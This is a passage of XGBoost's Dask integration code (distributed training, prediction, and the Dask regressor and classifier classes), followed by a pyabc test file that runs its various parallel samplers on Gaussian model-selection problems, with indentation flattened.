# dask paradigm. But as a side effect, the `evals_result` in single-node API
# is no longer supported since it mutates the input parameter, and it's not
# intuitive to sync the mutation result. Therefore, a dictionary containing
# evaluation history is instead returned.
def _get_workers_from_data(
dtrain: DaskDMatrix,
evals: Optional[List[Tuple[DaskDMatrix, str]]]
) -> Set[str]:
X_worker_map: Set[str] = set(dtrain.worker_map.keys())
if evals:
for e in evals:
assert len(e) == 2
assert isinstance(e[0], DaskDMatrix) and isinstance(e[1], str)
worker_map = set(e[0].worker_map.keys())
X_worker_map = X_worker_map.union(worker_map)
return X_worker_map
async def _train_async(
client: "distributed.Client",
global_config: Dict[str, Any],
params: Dict[str, Any],
dtrain: DaskDMatrix,
num_boost_round: int,
evals: Optional[List[Tuple[DaskDMatrix, str]]],
obj: Optional[Objective],
feval: Optional[Metric],
early_stopping_rounds: Optional[int],
verbose_eval: Union[int, bool],
xgb_model: Optional[Booster],
callbacks: Optional[List[TrainingCallback]]
) -> Optional[TrainReturnT]:
workers = list(_get_workers_from_data(dtrain, evals))
_rabit_args = await _get_rabit_args(len(workers), client)
def dispatched_train(
worker_addr: str,
rabit_args: List[bytes],
dtrain_ref: Dict,
dtrain_idt: int,
evals_ref: Dict
) -> Optional[Dict[str, Union[Booster, Dict]]]:
'''Perform training on a single worker. A local function prevents pickling.
'''
LOGGER.info('Training on %s', str(worker_addr))
worker = distributed.get_worker()
with RabitContext(rabit_args), config.config_context(**global_config):
local_dtrain = _dmatrix_from_list_of_parts(**dtrain_ref)
local_evals = []
if evals_ref:
for ref, name, idt in evals_ref:
if idt == dtrain_idt:
local_evals.append((local_dtrain, name))
continue
local_evals.append((_dmatrix_from_list_of_parts(**ref), name))
local_history: Dict = {}
local_param = params.copy() # just to be consistent
msg = 'Overriding `nthreads` defined in dask worker.'
override = ['nthread', 'n_jobs']
for p in override:
val = local_param.get(p, None)
if val is not None and val != worker.nthreads:
LOGGER.info(msg)
else:
local_param[p] = worker.nthreads
bst = worker_train(params=local_param,
dtrain=local_dtrain,
num_boost_round=num_boost_round,
evals_result=local_history,
evals=local_evals,
obj=obj,
feval=feval,
early_stopping_rounds=early_stopping_rounds,
verbose_eval=verbose_eval,
xgb_model=xgb_model,
callbacks=callbacks)
ret: Optional[Dict[str, Union[Booster, Dict]]] = {
'booster': bst, 'history': local_history}
if local_dtrain.num_row() == 0:
ret = None
return ret
# Note for function purity:
# XGBoost is deterministic in most of the cases, which means train function is
# supposed to be idempotent. One known exception is gblinear with shotgun updater.
# We haven't been able to do a full verification so here we keep pure to be False.
futures = []
for i, worker_addr in enumerate(workers):
if evals:
evals_per_worker = [(e.create_fn_args(worker_addr), name, id(e))
for e, name in evals]
else:
evals_per_worker = []
f = client.submit(dispatched_train,
worker_addr,
_rabit_args,
dtrain.create_fn_args(workers[i]),
id(dtrain),
evals_per_worker,
pure=False,
workers=[worker_addr])
futures.append(f)
results = await client.gather(futures)
return list(filter(lambda ret: ret is not None, results))[0]
def train(
client: "distributed.Client",
params: Dict[str, Any],
dtrain: DaskDMatrix,
num_boost_round: int = 10,
evals: Optional[List[Tuple[DaskDMatrix, str]]] = None,
obj: Optional[Objective] = None,
feval: Optional[Metric] = None,
early_stopping_rounds: Optional[int] = None,
xgb_model: Optional[Booster] = None,
verbose_eval: Union[int, bool] = True,
callbacks: Optional[List[TrainingCallback]] = None
) -> Any:
'''Train XGBoost model.
.. versionadded:: 1.0.0
.. note::
Other parameters are the same as `xgboost.train` except for `evals_result`, which
is returned as part of function return value instead of argument.
Parameters
----------
client :
Specify the dask client used for training. Use default client returned from dask
if it's set to None.
Returns
-------
results: dict
A dictionary containing trained booster and evaluation history. `history` field
is the same as `eval_result` from `xgboost.train`.
.. code-block:: python
{'booster': xgboost.Booster,
'history': {'train': {'logloss': ['0.48253', '0.35953']},
'eval': {'logloss': ['0.480385', '0.357756']}}}
'''
_assert_dask_support()
client = _xgb_get_client(client)
# Get global configuration before transferring computation to another thread or
# process.
global_config = config.get_config()
return client.sync(_train_async,
client=client,
global_config=global_config,
num_boost_round=num_boost_round,
obj=obj,
feval=feval,
params=params,
dtrain=dtrain,
evals=evals,
early_stopping_rounds=early_stopping_rounds,
verbose_eval=verbose_eval,
xgb_model=xgb_model,
callbacks=callbacks)
async def _direct_predict_impl(
client: "distributed.Client",
data: _DaskCollection,
predict_fn: Callable
) -> _DaskCollection:
if isinstance(data, da.Array):
predictions = await client.submit(
da.map_blocks,
predict_fn, data, False, drop_axis=1,
dtype=numpy.float32
).result()
return predictions
if isinstance(data, dd.DataFrame):
predictions = await client.submit(
dd.map_partitions,
predict_fn, data, True,
meta=dd.utils.make_meta({'prediction': 'f4'})
).result()
return predictions.iloc[:, 0]
raise TypeError('data of type: ' + str(type(data)) +
' is not supported by direct prediction')
# pylint: disable=too-many-statements
async def _predict_async(
client: "distributed.Client",
global_config: Dict[str, Any],
model: Union[Booster, Dict],
data: _DaskCollection,
output_margin: bool,
missing: float,
pred_leaf: bool,
pred_contribs: bool,
approx_contribs: bool,
pred_interactions: bool,
validate_features: bool
) -> _DaskCollection:
if isinstance(model, Booster):
booster = model
elif isinstance(model, dict):
booster = model['booster']
else:
raise TypeError(_expect([Booster, dict], type(model)))
if not isinstance(data, (DaskDMatrix, da.Array, dd.DataFrame)):
raise TypeError(_expect([DaskDMatrix, da.Array, dd.DataFrame],
type(data)))
def mapped_predict(partition: Any, is_df: bool) -> Any:
worker = distributed.get_worker()
with config.config_context(**global_config):
booster.set_param({'nthread': worker.nthreads})
m = DMatrix(partition, missing=missing, nthread=worker.nthreads)
predt = booster.predict(
data=m,
output_margin=output_margin,
pred_leaf=pred_leaf,
pred_contribs=pred_contribs,
approx_contribs=approx_contribs,
pred_interactions=pred_interactions,
validate_features=validate_features
)
if is_df:
if lazy_isinstance(partition, 'cudf', 'core.dataframe.DataFrame'):
import cudf
predt = cudf.DataFrame(predt, columns=['prediction'])
else:
predt = DataFrame(predt, columns=['prediction'])
return predt
# Predict on dask collection directly.
if isinstance(data, (da.Array, dd.DataFrame)):
return await _direct_predict_impl(client, data, mapped_predict)
# Prediction on dask DMatrix.
worker_map = data.worker_map
partition_order = data.partition_order
feature_names = data.feature_names
feature_types = data.feature_types
missing = data.missing
meta_names = data.meta_names
def dispatched_predict(
worker_id: int, list_of_orders: List[int], list_of_parts: _DataParts
) -> List[Tuple[Tuple["dask.delayed.Delayed", int], int]]:
'''Perform prediction on each worker.'''
LOGGER.info('Predicting on %d', worker_id)
with config.config_context(**global_config):
worker = distributed.get_worker()
list_of_parts = _get_worker_parts_ordered(meta_names, list_of_parts)
predictions = []
booster.set_param({'nthread': worker.nthreads})
for i, parts in enumerate(list_of_parts):
(data, _, _, base_margin, _, _) = parts
order = list_of_orders[i]
local_part = DMatrix(
data,
base_margin=base_margin,
feature_names=feature_names,
feature_types=feature_types,
missing=missing,
nthread=worker.nthreads
)
predt = booster.predict(
data=local_part,
output_margin=output_margin,
pred_leaf=pred_leaf,
pred_contribs=pred_contribs,
approx_contribs=approx_contribs,
pred_interactions=pred_interactions,
validate_features=validate_features
)
columns = 1 if len(predt.shape) == 1 else predt.shape[1]
ret = ((dask.delayed(predt), columns), order) # pylint: disable=no-member
predictions.append(ret)
return predictions
def dispatched_get_shape(
worker_id: int, list_of_orders: List[int], list_of_parts: _DataParts
) -> List[Tuple[int, int]]:
'''Get shape of data in each worker.'''
LOGGER.info('Get shape on %d', worker_id)
list_of_parts = _get_worker_parts_ordered(meta_names, list_of_parts)
shapes = []
for i, parts in enumerate(list_of_parts):
(data, _, _, _, _, _) = parts
shapes.append((data.shape, list_of_orders[i]))
return shapes
async def map_function(
func: Callable[[int, List[int], _DataParts], Any]
) -> List[Any]:
'''Run function for each part of the data.'''
futures = []
workers_address = list(worker_map.keys())
for wid, worker_addr in enumerate(workers_address):
worker_addr = workers_address[wid]
list_of_parts = worker_map[worker_addr]
list_of_orders = [partition_order[part.key] for part in list_of_parts]
f = client.submit(func, worker_id=wid,
list_of_orders=list_of_orders,
list_of_parts=list_of_parts,
pure=True, workers=[worker_addr])
assert isinstance(f, distributed.client.Future)
futures.append(f)
# Get delayed objects
results = await client.gather(futures)
# flatten into 1 dim list
results = [t for list_per_worker in results for t in list_per_worker]
# sort by order, l[0] is the delayed object, l[1] is its order
results = sorted(results, key=lambda l: l[1])
results = [predt for predt, order in results] # remove order
return results
results = await map_function(dispatched_predict)
shapes = await map_function(dispatched_get_shape)
# Constructing a dask array from list of numpy arrays
# See https://docs.dask.org/en/latest/array-creation.html
arrays = []
for i, shape in enumerate(shapes):
arrays.append(da.from_delayed(
results[i][0], shape=(shape[0],)
if results[i][1] == 1 else (shape[0], results[i][1]),
dtype=numpy.float32))
predictions = await da.concatenate(arrays, axis=0)
return predictions
def predict(
client: "distributed.Client",
model: Union[TrainReturnT, Booster],
data: Union[DaskDMatrix, _DaskCollection],
output_margin: bool = False,
missing: float = numpy.nan,
pred_leaf: bool = False,
pred_contribs: bool = False,
approx_contribs: bool = False,
pred_interactions: bool = False,
validate_features: bool = True
) -> Any:
'''Run prediction with a trained booster.
.. note::
Only default prediction mode is supported right now.
.. versionadded:: 1.0.0
Parameters
----------
client:
Specify the dask client used for training. Use default client
returned from dask if it's set to None.
model:
The trained model.
data:
Input data used for prediction. When input is a dataframe object,
prediction output is a series.
missing:
Used when input data is not DaskDMatrix. Specify the value
considered as missing.
Returns
-------
prediction: dask.array.Array/dask.dataframe.Series
'''
_assert_dask_support()
client = _xgb_get_client(client)
global_config = config.get_config()
return client.sync(
_predict_async, client, global_config, model, data,
output_margin=output_margin,
missing=missing,
pred_leaf=pred_leaf,
pred_contribs=pred_contribs,
approx_contribs=approx_contribs,
pred_interactions=pred_interactions,
validate_features=validate_features
)
async def _inplace_predict_async(
client: "distributed.Client",
global_config: Dict[str, Any],
model: Union[Booster, Dict],
data: _DaskCollection,
iteration_range: Tuple[int, int] = (0, 0),
predict_type: str = 'value',
missing: float = numpy.nan
) -> _DaskCollection:
client = _xgb_get_client(client)
if isinstance(model, Booster):
booster = model
elif isinstance(model, dict):
booster = model['booster']
else:
raise TypeError(_expect([Booster, dict], type(model)))
if not isinstance(data, (da.Array, dd.DataFrame)):
raise TypeError(_expect([da.Array, dd.DataFrame], type(data)))
def mapped_predict(data: Any, is_df: bool) -> Any:
worker = distributed.get_worker()
config.set_config(**global_config)
booster.set_param({'nthread': worker.nthreads})
prediction = booster.inplace_predict(
data,
iteration_range=iteration_range,
predict_type=predict_type,
missing=missing)
if is_df:
if lazy_isinstance(data, 'cudf.core.dataframe', 'DataFrame'):
import cudf
prediction = cudf.DataFrame({'prediction': prediction},
dtype=numpy.float32)
else:
# If it's from pandas, the partition is a numpy array
prediction = DataFrame(prediction, columns=['prediction'],
dtype=numpy.float32)
return prediction
return await _direct_predict_impl(client, data, mapped_predict)
def inplace_predict(
client: "distributed.Client",
model: Union[TrainReturnT, Booster],
data: _DaskCollection,
iteration_range: Tuple[int, int] = (0, 0),
predict_type: str = 'value',
missing: float = numpy.nan
) -> Any:
'''Inplace prediction.
.. versionadded:: 1.1.0
Parameters
----------
client:
Specify the dask client used for training. Use default client
returned from dask if it's set to None.
model:
The trained model.
iteration_range:
Specify the range of trees used for prediction.
predict_type:
* 'value': Normal prediction result.
* 'margin': Output the raw untransformed margin value.
missing:
Value in the input data which needs to be present as a missing
value. If None, defaults to np.nan.
Returns
-------
prediction
'''
_assert_dask_support()
client = _xgb_get_client(client)
global_config = config.get_config()
return client.sync(_inplace_predict_async, client, global_config, model=model,
data=data,
iteration_range=iteration_range,
predict_type=predict_type,
missing=missing)
async def _evaluation_matrices(
client: "distributed.Client",
validation_set: Optional[List[Tuple[_DaskCollection, _DaskCollection]]],
sample_weight: Optional[List[_DaskCollection]],
missing: float
) -> Optional[List[Tuple[DaskDMatrix, str]]]:
'''
Parameters
----------
validation_set: list of tuples
Each tuple contains a validation dataset including input X and label y.
E.g.:
.. code-block:: python
[(X_0, y_0), (X_1, y_1), ... ]
sample_weights: list of arrays
The weight vector for validation data.
Returns
-------
evals: list of validation DMatrix
'''
evals: Optional[List[Tuple[DaskDMatrix, str]]] = []
if validation_set is not None:
assert isinstance(validation_set, list)
for i, e in enumerate(validation_set):
w = (sample_weight[i] if sample_weight is not None else None)
dmat = await DaskDMatrix(client=client, data=e[0], label=e[1],
weight=w, missing=missing)
assert isinstance(evals, list)
evals.append((dmat, 'validation_{}'.format(i)))
else:
evals = None
return evals
class DaskScikitLearnBase(XGBModel):
'''Base class for implementing scikit-learn interface with Dask'''
_client = None
# pylint: disable=arguments-differ
@_deprecate_positional_args
def fit(
self,
X: _DaskCollection,
y: _DaskCollection,
*,
sample_weight: Optional[_DaskCollection] = None,
base_margin: Optional[_DaskCollection] = None,
eval_set: List[Tuple[_DaskCollection, _DaskCollection]] = None,
eval_metric: Optional[Callable] = None,
sample_weight_eval_set: Optional[List[_DaskCollection]] = None,
early_stopping_rounds: Optional[int] = None,
verbose: bool = True,
feature_weights: Optional[_DaskCollection] = None,
callbacks: List[TrainingCallback] = None
) -> "DaskScikitLearnBase":
'''Fit gradient boosting model
Parameters
----------
X : array_like
Feature matrix
y : array_like
Labels
sample_weight : array_like
instance weights
eval_set : list, optional
A list of (X, y) tuple pairs to use as validation sets, for which
metrics will be computed.
Validation metrics will help us track the performance of the model.
eval_metric : str, list of str, or callable, optional
sample_weight_eval_set : list, optional
A list of the form [L_1, L_2, ..., L_n], where each L_i is a list
of group weights on the i-th validation set.
early_stopping_rounds : int
Activates early stopping.
verbose : bool
If `verbose` and an evaluation set is used, writes the evaluation
metric measured on the validation set to stderr.
feature_weights: array_like
Weight for each feature, defines the probability of each feature being
selected when colsample is being used. All values must be greater than 0,
otherwise a `ValueError` is thrown. Only available for `hist`, `gpu_hist` and
`exact` tree methods.
callbacks : list of callback functions
List of callback functions that are applied at end of each iteration.
It is possible to use predefined callbacks by using :ref:`callback_api`.
Example:
.. code-block:: python
callbacks = [xgb.callback.EarlyStopping(rounds=early_stopping_rounds,
save_best=True)]
'''
raise NotImplementedError
def predict(
self,
data: _DaskCollection,
output_margin: bool = False,
ntree_limit: Optional[int] = None,
validate_features: bool = True,
base_margin: Optional[_DaskCollection] = None
) -> Any:
'''Predict with `data`.
Parameters
----------
data: data that can be used to construct a DaskDMatrix
output_margin : Whether to output the raw untransformed margin value.
ntree_limit : NOT supported on dask interface.
validate_features :
When this is True, validate that the Booster's and data's feature_names are
identical. Otherwise, it is assumed that the feature_names are the same.
Returns
-------
prediction:
'''
raise NotImplementedError
def __await__(self) -> Awaitable[Any]:
# Generate a coroutine wrapper to make this class awaitable.
async def _() -> Awaitable[Any]:
return self
return self.client.sync(_).__await__()
@property
def client(self) -> "distributed.Client":
'''The dask client used in this model.'''
client = _xgb_get_client(self._client)
return client
@client.setter
def client(self, clt: "distributed.Client") -> None:
self._client = clt
@xgboost_model_doc("""Implementation of the Scikit-Learn API for XGBoost.""",
['estimators', 'model'])
class DaskXGBRegressor(DaskScikitLearnBase, XGBRegressorBase):
# pylint: disable=missing-class-docstring
async def _fit_async(
self, X: _DaskCollection,
y: _DaskCollection,
sample_weight: Optional[_DaskCollection],
base_margin: Optional[_DaskCollection],
eval_set: Optional[List[Tuple[_DaskCollection, _DaskCollection]]],
eval_metric: Optional[Union[str, List[str], Callable]],
sample_weight_eval_set: Optional[List[_DaskCollection]],
early_stopping_rounds: int,
verbose: bool,
feature_weights: Optional[_DaskCollection],
callbacks: Optional[List[TrainingCallback]]
) -> _DaskCollection:
dtrain = await DaskDMatrix(client=self.client,
data=X,
label=y,
weight=sample_weight,
base_margin=base_margin,
feature_weights=feature_weights,
missing=self.missing)
params = self.get_xgb_params()
evals = await _evaluation_matrices(self.client, eval_set,
sample_weight_eval_set,
self.missing)
if callable(self.objective):
obj = _objective_decorator(self.objective)
else:
obj = None
metric = eval_metric if callable(eval_metric) else None
if eval_metric is not None:
if callable(eval_metric):
eval_metric = None
else:
params.update({"eval_metric": eval_metric})
results = await train(client=self.client,
params=params,
dtrain=dtrain,
num_boost_round=self.get_num_boosting_rounds(),
evals=evals,
feval=metric,
obj=obj,
verbose_eval=verbose,
early_stopping_rounds=early_stopping_rounds,
callbacks=callbacks)
self._Booster = results['booster']
# pylint: disable=attribute-defined-outside-init
self.evals_result_ = results['history']
return self
# pylint: disable=missing-docstring
@_deprecate_positional_args
def fit(
self,
X: _DaskCollection,
y: _DaskCollection,
*,
sample_weight: Optional[_DaskCollection] = None,
base_margin: Optional[_DaskCollection] = None,
eval_set: List[Tuple[_DaskCollection, _DaskCollection]] = None,
eval_metric: Optional[Callable] = None,
sample_weight_eval_set: Optional[List[_DaskCollection]] = None,
early_stopping_rounds: Optional[int] = None,
verbose: bool = True,
feature_weights: Optional[_DaskCollection] = None,
callbacks: List[TrainingCallback] = None
) -> "DaskXGBRegressor":
_assert_dask_support()
return self.client.sync(self._fit_async,
X=X,
y=y,
sample_weight=sample_weight,
base_margin=base_margin,
eval_set=eval_set,
eval_metric=eval_metric,
sample_weight_eval_set=sample_weight_eval_set,
early_stopping_rounds=early_stopping_rounds,
verbose=verbose,
feature_weights=feature_weights,
callbacks=callbacks)
async def _predict_async(
self, data: _DaskCollection,
output_margin: bool = False,
validate_features: bool = True,
base_margin: Optional[_DaskCollection] = None
) -> _DaskCollection:
test_dmatrix = await DaskDMatrix(
client=self.client, data=data, base_margin=base_margin,
missing=self.missing
)
pred_probs = await predict(client=self.client,
model=self.get_booster(), data=test_dmatrix,
output_margin=output_margin,
validate_features=validate_features)
return pred_probs
# pylint: disable=arguments-differ
def predict(
self,
data: _DaskCollection,
output_margin: bool = False,
ntree_limit: Optional[int] = None,
validate_features: bool = True,
base_margin: Optional[_DaskCollection] = None
) -> Any:
_assert_dask_support()
msg = '`ntree_limit` is not supported on dask, use model slicing instead.'
assert ntree_limit is None, msg
return self.client.sync(self._predict_async, data,
output_margin=output_margin,
validate_features=validate_features,
base_margin=base_margin)
@xgboost_model_doc(
'Implementation of the scikit-learn API for XGBoost classification.',
['estimators', 'model'])
class DaskXGBClassifier(DaskScikitLearnBase, XGBClassifierBase):
# pylint: disable=missing-class-docstring
async def _fit_async(
self, X: _DaskCollection, y: _DaskCollection,
sample_weight: Optional[_DaskCollection],
base_margin: Optional[_DaskCollection],
eval_set: Optional[List[Tuple[_DaskCollection, _DaskCollection]]],
eval_metric: Optional[Union[str, List[str], Callable]],
sample_weight_eval_set: Optional[List[_DaskCollection]],
early_stopping_rounds: int,
verbose: bool,
feature_weights: Optional[_DaskCollection],
callbacks: Optional[List[TrainingCallback]]
) -> "DaskXGBClassifier":
dtrain = await DaskDMatrix(client=self.client,
data=X,
label=y,
weight=sample_weight,
base_margin=base_margin,
feature_weights=feature_weights,
missing=self.missing)
params = self.get_xgb_params()
# pylint: disable=attribute-defined-outside-init
if isinstance(y, (da.Array)):
self.classes_ = await self.client.compute(da.unique(y))
else:
self.classes_ = await self.client.compute(y.drop_duplicates())
self.n_classes_ = len(self.classes_)
if self.n_classes_ > 2:
params["objective"] = "multi:softprob"
params['num_class'] = self.n_classes_
else:
params["objective"] = "binary:logistic"
evals = await _evaluation_matrices(self.client, eval_set,
sample_weight_eval_set,
self.missing)
if callable(self.objective):
obj = _objective_decorator(self.objective)
else:
obj = None
metric = eval_metric if callable(eval_metric) else None
if eval_metric is not None:
if callable(eval_metric):
eval_metric = None
else:
params.update({"eval_metric": eval_metric})
results = await train(client=self.client,
params=params,
dtrain=dtrain,
num_boost_round=self.get_num_boosting_rounds(),
evals=evals,
obj=obj,
feval=metric,
verbose_eval=verbose,
early_stopping_rounds=early_stopping_rounds,
callbacks=callbacks)
self._Booster = results['booster']
if not callable(self.objective):
self.objective = params["objective"]
# pylint: disable=attribute-defined-outside-init
self.evals_result_ = results['history']
return self
@_deprecate_positional_args
def fit(
self,
X: _DaskCollection,
y: _DaskCollection,
*,
sample_weight: Optional[_DaskCollection] = None,
base_margin: Optional[_DaskCollection] = None,
eval_set: Optional[List[Tuple[_DaskCollection, _DaskCollection]]] = None,
eval_metric: Optional[Union[str, List[str], Callable]] = None,
sample_weight_eval_set: Optional[List[_DaskCollection]] = None,
early_stopping_rounds: int = None,
verbose: bool = True,
feature_weights: _DaskCollection = None,
callbacks: Optional[List[TrainingCallback]] = None
) -> "DaskXGBClassifier":
_assert_dask_support()
return self.client.sync(self._fit_async,
X=X,
y=y,
sample_weight=sample_weight,
base_margin=base_margin,
eval_set=eval_set,
eval_metric=eval_metric,
sample_weight_eval_set=sample_weight_eval_set,
early_stopping_rounds=early_stopping_rounds,
verbose=verbose,
feature_weights=feature_weights,
callbacks=callbacks)
async def _predict_proba_async(
self,
X: _DaskCollection,
validate_features: bool,
output_margin: bool,
base_margin: Optional[_DaskCollection]
) -> _DaskCollection:
test_dmatrix = await DaskDMatrix(
client=self.client, data=X, base_margin=base_margin,
missing=self.missing
)
pred_probs = await predict(client=self.client,
model=self.get_booster(),
data=test_dmatrix,
validate_features=validate_features,
output_margin=output_margin)
return _cls_predict_proba(self.objective, pred_probs, da.vstack)
# pylint: disable=arguments-differ,missing-docstring
def predict_proba(
self,
X: _DaskCollection,
ntree_limit: Optional[int] = None,
validate_features: bool = True,
output_margin: bool = False,
base_margin: Optional[_DaskCollection] = None
) -> Any:
_assert_dask_support()
msg = '`ntree_limit` is not supported on dask, use model slicing instead.'
assert ntree_limit is None, msg
return self.client.sync(
self._predict_proba_async,
X=X,
validate_features=validate_features,
output_margin=output_margin,
base_margin=base_margin
)
async def _predict_async(
self, data: _DaskCollection,
output_margin: bool = False,
validate_features: bool = True,
base_margin: Optional[_DaskCollection] = None
) -> _DaskCollection:
test_dmatrix = await DaskDMatrix(
client=self.client, data=data, base_margin=base_margin,
missing=self.missing
)
pred_probs = await predict(
client=self.client,
model=self.get_booster(),
data=test_dmatrix,
output_margin=output_margin,
validate_features=validate_features
)
if output_margin:
return pred_probs
if self.n_classes_ == 2:
preds = (pred_probs > 0.5).astype(int)
else:
preds = da.argmax(pred_probs, axis=1)
return preds
# pylint: disable=arguments-differ
def predict(
self,
data: _DaskCollection,
output_margin: bool = False,
ntree_limit: Optional[int] = None,
validate_features: bool = True,
base_margin: Optional[_DaskCollection] = None
) -> Any:
_assert_dask_support()
msg = '`ntree_limit` is not supported on dask, use model slicing instead.'
assert ntree_limit is None, msg
return self.client.sync(
self._predict_async,
data,
output_margin=output_margin,
validate_features=validate_features,
base_margin=base_margin
)
|
test_samplers.py
|
import multiprocessing
import pytest
import numpy as np
import scipy.stats as st
import pandas as pd
from concurrent.futures import ThreadPoolExecutor, ProcessPoolExecutor
from pyabc.sampler import (SingleCoreSampler,
MappingSampler,
MulticoreParticleParallelSampler,
DaskDistributedSampler,
ConcurrentFutureSampler,
MulticoreEvalParallelSampler,
RedisEvalParallelSamplerServerStarter,
RedisStaticSamplerServerStarter)
import pyabc
import logging
import os
import tempfile
logger = logging.getLogger(__name__)
def multi_proc_map(f, x):
with multiprocessing.Pool() as pool:
res = pool.map(f, x)
return res
class GenericFutureWithProcessPool(ConcurrentFutureSampler):
def __init__(self, map_=None):
cfuture_executor = ProcessPoolExecutor(max_workers=8)
client_max_jobs = 8
super().__init__(cfuture_executor, client_max_jobs)
class GenericFutureWithProcessPoolBatch(ConcurrentFutureSampler):
def __init__(self, map_=None):
cfuture_executor = ProcessPoolExecutor(max_workers=8)
client_max_jobs = 8
batch_size = 15
super().__init__(cfuture_executor, client_max_jobs,
batch_size=batch_size)
class GenericFutureWithThreadPool(ConcurrentFutureSampler):
def __init__(self, map_=None):
cfuture_executor = ThreadPoolExecutor(max_workers=8)
client_max_jobs = 8
super().__init__(cfuture_executor, client_max_jobs)
class MultiProcessingMappingSampler(MappingSampler):
def __init__(self, map_=None):
super().__init__(multi_proc_map)
class DaskDistributedSamplerBatch(DaskDistributedSampler):
def __init__(self, map_=None):
batch_size = 20
super().__init__(batch_size=batch_size)
class WrongOutputSampler(SingleCoreSampler):
def sample_until_n_accepted(
self, n, simulate_one, t, *,
max_eval=np.inf, all_accepted=False, ana_vars=None):
return super().sample_until_n_accepted(
n+1, simulate_one, t, max_eval=max_eval,
all_accepted=all_accepted, ana_vars=ana_vars)
def RedisEvalParallelSamplerWrapper(**kwargs):
return RedisEvalParallelSamplerServerStarter(batch_size=5, **kwargs)
def RedisEvalParallelSamplerLookAheadDelayWrapper(**kwargs):
return RedisEvalParallelSamplerServerStarter(
look_ahead=True, look_ahead_delay_evaluation=True, **kwargs)
def RedisStaticSamplerWrapper(**kwargs):
return RedisStaticSamplerServerStarter(**kwargs)
def PicklingMulticoreParticleParallelSampler():
return MulticoreParticleParallelSampler(pickle=True)
def PicklingMulticoreEvalParallelSampler():
return MulticoreEvalParallelSampler(pickle=True)
@pytest.fixture(params=[SingleCoreSampler,
RedisEvalParallelSamplerWrapper,
RedisEvalParallelSamplerLookAheadDelayWrapper,
RedisStaticSamplerWrapper,
MulticoreEvalParallelSampler,
MultiProcessingMappingSampler,
MulticoreParticleParallelSampler,
PicklingMulticoreParticleParallelSampler,
PicklingMulticoreEvalParallelSampler,
MappingSampler,
DaskDistributedSampler,
DaskDistributedSamplerBatch,
GenericFutureWithThreadPool,
GenericFutureWithProcessPool,
GenericFutureWithProcessPoolBatch,
])
def sampler(request):
s = request.param()
try:
yield s
finally:
# release all resources
try:
s.shutdown()
except AttributeError:
pass
@pytest.fixture
def redis_starter_sampler(request):
s = RedisEvalParallelSamplerServerStarter(batch_size=5)
try:
yield s
finally:
# release all resources
s.shutdown()
def basic_testcase():
"""A simple test model."""
def model(p):
return {"y": p['p0'] + 0.1 * np.random.randn(10)}
prior = pyabc.Distribution(
p0=pyabc.RV('uniform', -5, 10), p1=pyabc.RV('uniform', -2, 2))
def distance(y1, y2):
return np.abs(y1['y'] - y2['y']).sum()
obs = {'y': 1}
return model, prior, distance, obs
def test_two_competing_gaussians_multiple_population(db_path, sampler):
two_competing_gaussians_multiple_population(
db_path, sampler, 1)
def test_two_competing_gaussians_multiple_population_2_evaluations(
db_path, sampler):
two_competing_gaussians_multiple_population(db_path, sampler, 2)
def two_competing_gaussians_multiple_population(db_path, sampler, n_sim):
# Define a gaussian model
sigma = .5
def model(args):
return {"y": st.norm(args['x'], sigma).rvs()}
# We define two models, but they are identical so far
models = [model, model]
models = list(map(pyabc.SimpleModel, models))
# However, our models' priors are not the same. Their mean differs.
mu_x_1, mu_x_2 = 0, 1
parameter_given_model_prior_distribution = [
pyabc.Distribution(x=pyabc.RV("norm", mu_x_1, sigma)),
pyabc.Distribution(x=pyabc.RV("norm", mu_x_2, sigma)),
]
# We plug all the ABC setups together
nr_populations = 2
pop_size = pyabc.ConstantPopulationSize(23, nr_samples_per_parameter=n_sim)
abc = pyabc.ABCSMC(models, parameter_given_model_prior_distribution,
pyabc.PercentileDistance(measures_to_use=["y"]),
pop_size,
eps=pyabc.MedianEpsilon(),
sampler=sampler)
# Finally we add meta data such as model names and
# define where to store the results
# y_observed is the important piece here: our actual observation.
y_observed = 1
abc.new(db_path, {"y": y_observed})
# We run the ABC with 3 populations max
minimum_epsilon = .05
history = abc.run(minimum_epsilon, max_nr_populations=nr_populations)
# Evaluate the model probabilities
mp = history.get_model_probabilities(history.max_t)
def p_y_given_model(mu_x_model):
res = st.norm(mu_x_model, np.sqrt(sigma**2 + sigma**2)).pdf(y_observed)
return res
p1_expected_unnormalized = p_y_given_model(mu_x_1)
p2_expected_unnormalized = p_y_given_model(mu_x_2)
p1_expected = p1_expected_unnormalized / (p1_expected_unnormalized
+ p2_expected_unnormalized)
p2_expected = p2_expected_unnormalized / (p1_expected_unnormalized
+ p2_expected_unnormalized)
assert history.max_t == nr_populations-1
# the next line only tests if we obtain correct numerical types
try:
mp0 = mp.p[0]
except KeyError:
mp0 = 0
try:
mp1 = mp.p[1]
except KeyError:
mp1 = 0
assert abs(mp0 - p1_expected) + abs(mp1 - p2_expected) < np.inf
# check that sampler only did nr_particles samples in first round
pops = history.get_all_populations()
# since we had calibration (of epsilon), check that was saved
pre_evals = pops[pops['t'] == pyabc.History.PRE_TIME]['samples'].values
assert pre_evals >= pop_size.nr_particles
# our samplers should not have overhead in calibration, except batching
batch_size = sampler.batch_size if hasattr(sampler, 'batch_size') else 1
max_expected = pop_size.nr_particles + batch_size - 1
if pre_evals > max_expected:
# Violations have been observed occasionally for the redis server
# due to runtime conditions with the increase of the evaluations
# counter. This could be overcome, but as it usually only happens
# for low-runtime models, this should not be a problem. Thus, only
# print a warning here.
logger.warning(
f"Had {pre_evals} simulations in the calibration iteration, "
f"but a maximum of {max_expected} would have been sufficient for "
f"the population size of {pop_size.nr_particles}.")
def test_progressbar(sampler):
"""Test whether using a progress bar gives any errors."""
model, prior, distance, obs = basic_testcase()
abc = pyabc.ABCSMC(
model, prior, distance, sampler=sampler, population_size=20)
abc.new(db=pyabc.create_sqlite_db_id(), observed_sum_stat=obs)
abc.run(max_nr_populations=3)
def test_in_memory(redis_starter_sampler):
db_path = "sqlite://"
two_competing_gaussians_multiple_population(db_path,
redis_starter_sampler, 1)
def test_wrong_output_sampler():
sampler = WrongOutputSampler()
def simulate_one():
return pyabc.Particle(m=0, parameter={}, weight=0,
accepted_sum_stats=[], accepted_distances=[],
accepted=True)
with pytest.raises(AssertionError):
sampler.sample_until_n_accepted(5, simulate_one, 0)
def test_redis_multiprocess():
def simulate_one():
accepted = np.random.randint(2)
return pyabc.Particle(0, {}, 0.1, [], [], accepted)
sampler = RedisEvalParallelSamplerServerStarter(
batch_size=3, workers=1, processes_per_worker=2)
try:
# id needs to be set
sampler.set_analysis_id("ana_id")
sample = sampler.sample_until_n_accepted(10, simulate_one, 0)
assert 10 == len(sample.get_accepted_population())
finally:
sampler.shutdown()
